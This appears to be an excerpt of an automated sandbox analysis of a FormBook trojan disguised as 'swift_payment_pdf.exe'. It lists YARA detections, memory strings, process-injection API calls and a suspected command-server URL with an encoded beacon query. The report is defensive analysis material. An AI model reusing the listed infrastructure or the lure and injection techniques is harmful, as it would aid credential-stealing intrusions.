            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 10:37:55 GMTServer: ApacheAccess-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicenameExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: flexmarkx_x5_sess_id=ocojme6j9q0ajf5vusma8tpnm2; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingX-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhostTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 61 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 4e 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 41 43 48 45 2d 43 4f 4e 54 52 4f 4c 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 45 58 50 49 52 45 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4d 6f 6e 2c 20 32 32 20 4a 75 6c 20 32 30 30 32 20 31 31 3a 31 32 3a 30 31 20 47 4d 54 22 3e 0a 0a 3c 74 69 74 6c 65 3e 46 4f 55 52 20 4f 48 20 46 4f 55 52 21 20 28 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 Data Ascii: a0e<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META NAME="ROBOTS" CONTENT="NONE"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"><META HTTP-EQUIV="EXPIRES" CONTENT="Mon, 22 Jul 2002 11:12:01 GMT"><title>FOUR OH FOUR! (404)</title><st
            Source: explorer.exe, 00000007.00000002.3556356066.0000000005E6A000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002F4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://soft.365jz.com/
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915539193.00000000058A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com0
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: AbWHWpocGREf.exe, 00000008.00000002.3556641408.0000000004B56000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wwfglobal.com
            Source: AbWHWpocGREf.exe, 00000008.00000002.3556641408.0000000004B56000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wwfglobal.com/awho/
            Source: swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033gPR
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: explorer.exe, 00000007.00000003.2427925952.0000000007FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: explorer.exe, 00000007.00000002.3556356066.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002A94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2537070177.000000000CC84000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vR

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.swift_payment_pdf.exe.2ee85a0.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.swift_payment_pdf.exe.7a50000.6.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: swift_payment_pdf.exe
            Source: initial sampleStatic PE information: Filename: swift_payment_pdf.exe
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0042B4F3 NtClose,5_2_0042B4F3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392B60 NtClose,LdrInitializeThunk,5_2_01392B60
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01392DF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01392C70
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013935C0 NtCreateMutant,LdrInitializeThunk,5_2_013935C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01394340 NtSetContextThread,5_2_01394340
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01394650 NtSuspendThread,5_2_01394650
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392BA0 NtEnumerateValueKey,5_2_01392BA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392B80 NtQueryInformationFile,5_2_01392B80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392BF0 NtAllocateVirtualMemory,5_2_01392BF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392BE0 NtQueryValueKey,5_2_01392BE0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392AB0 NtWaitForSingleObject,5_2_01392AB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392AF0 NtWriteFile,5_2_01392AF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392AD0 NtReadFile,5_2_01392AD0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392D30 NtUnmapViewOfSection,5_2_01392D30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392D10 NtMapViewOfSection,5_2_01392D10
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392D00 NtSetInformationFile,5_2_01392D00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392DB0 NtEnumerateKey,5_2_01392DB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392DD0 NtDelayExecution,5_2_01392DD0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392C00 NtQueryInformationProcess,5_2_01392C00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392C60 NtCreateKey,5_2_01392C60
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392CA0 NtQueryInformationToken,5_2_01392CA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392CF0 NtOpenProcess,5_2_01392CF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392CC0 NtQueryVirtualMemory,5_2_01392CC0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392F30 NtCreateSection,5_2_01392F30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392F60 NtCreateProcessEx,5_2_01392F60
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392FB0 NtResumeThread,5_2_01392FB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392FA0 NtQuerySection,5_2_01392FA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392F90 NtProtectVirtualMemory,5_2_01392F90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392FE0 NtCreateFile,5_2_01392FE0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392E30 NtWriteVirtualMemory,5_2_01392E30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392EA0 NtAdjustPrivilegesToken,5_2_01392EA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392E80 NtReadVirtualMemory,5_2_01392E80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392EE0 NtQueueApcThread,5_2_01392EE0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01393010 NtOpenDirectoryObject,5_2_01393010
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01393090 NtSetValueKey,5_2_01393090
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013939B0 NtGetContextThread,5_2_013939B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01393D10 NtOpenProcessToken,5_2_01393D10
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01393D70 NtOpenThread,5_2_01393D70
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05014650 NtSuspendThread,LdrInitializeThunk,7_2_05014650
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05014340 NtSetContextThread,LdrInitializeThunk,7_2_05014340
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05012D10
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05012D30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012DD0 NtDelayExecution,LdrInitializeThunk,7_2_05012DD0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05012DF0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012C60 NtCreateKey,LdrInitializeThunk,7_2_05012C60
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05012C70
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05012CA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012F30 NtCreateSection,LdrInitializeThunk,7_2_05012F30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012FB0 NtResumeThread,LdrInitializeThunk,7_2_05012FB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012FE0 NtCreateFile,LdrInitializeThunk,7_2_05012FE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05012E80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05012EE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012B60 NtClose,LdrInitializeThunk,7_2_05012B60
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05012BA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05012BE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05012BF0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012AD0 NtReadFile,LdrInitializeThunk,7_2_05012AD0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012AF0 NtWriteFile,LdrInitializeThunk,7_2_05012AF0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050135C0 NtCreateMutant,LdrInitializeThunk,7_2_050135C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050139B0 NtGetContextThread,LdrInitializeThunk,7_2_050139B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012D00 NtSetInformationFile,7_2_05012D00
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012DB0 NtEnumerateKey,7_2_05012DB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012C00 NtQueryInformationProcess,7_2_05012C00
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012CC0 NtQueryVirtualMemory,7_2_05012CC0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012CF0 NtOpenProcess,7_2_05012CF0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012F60 NtCreateProcessEx,7_2_05012F60
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012F90 NtProtectVirtualMemory,7_2_05012F90
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012FA0 NtQuerySection,7_2_05012FA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012E30 NtWriteVirtualMemory,7_2_05012E30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012EA0 NtAdjustPrivilegesToken,7_2_05012EA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012B80 NtQueryInformationFile,7_2_05012B80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05012AB0 NtWaitForSingleObject,7_2_05012AB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05013010 NtOpenDirectoryObject,7_2_05013010
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05013090 NtSetValueKey,7_2_05013090
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05013D10 NtOpenProcessToken,7_2_05013D10
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05013D70 NtOpenThread,7_2_05013D70
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F18240 NtAllocateVirtualMemory,7_2_02F18240
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F180E0 NtClose,7_2_02F180E0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F18040 NtDeleteFile,7_2_02F18040
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F17F50 NtReadFile,7_2_02F17F50
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F17DF0 NtCreateFile,7_2_02F17DF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_014CD5BC0_2_014CD5BC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED65E70_2_04ED65E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED86800_2_04ED8680
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED86700_2_04ED8670
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED6E780_2_04ED6E78
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04EDCE580_2_04EDCE58
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED8FB00_2_04ED8FB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED6A400_2_04ED6A40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED6A300_2_04ED6A30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004011605_2_00401160
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004101135_2_00410113
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0042D9335_2_0042D933
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004031905_2_00403190
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_00416A5F5_2_00416A5F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_00416A635_2_00416A63
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004103335_2_00410333
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040E3B35_2_0040E3B3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004025005_2_00402500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FA1185_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013501005_2_01350100
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E81585_2_013E8158
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014181CC5_2_014181CC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014141A25_2_014141A2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014201AA5_2_014201AA
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F20005_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141A3525_2_0141A352
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014203E65_2_014203E6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F05_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014002745_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E02C05_2_013E02C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013605355_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014205915_2_01420591
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014124465_2_01412446
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014044205_2_01404420
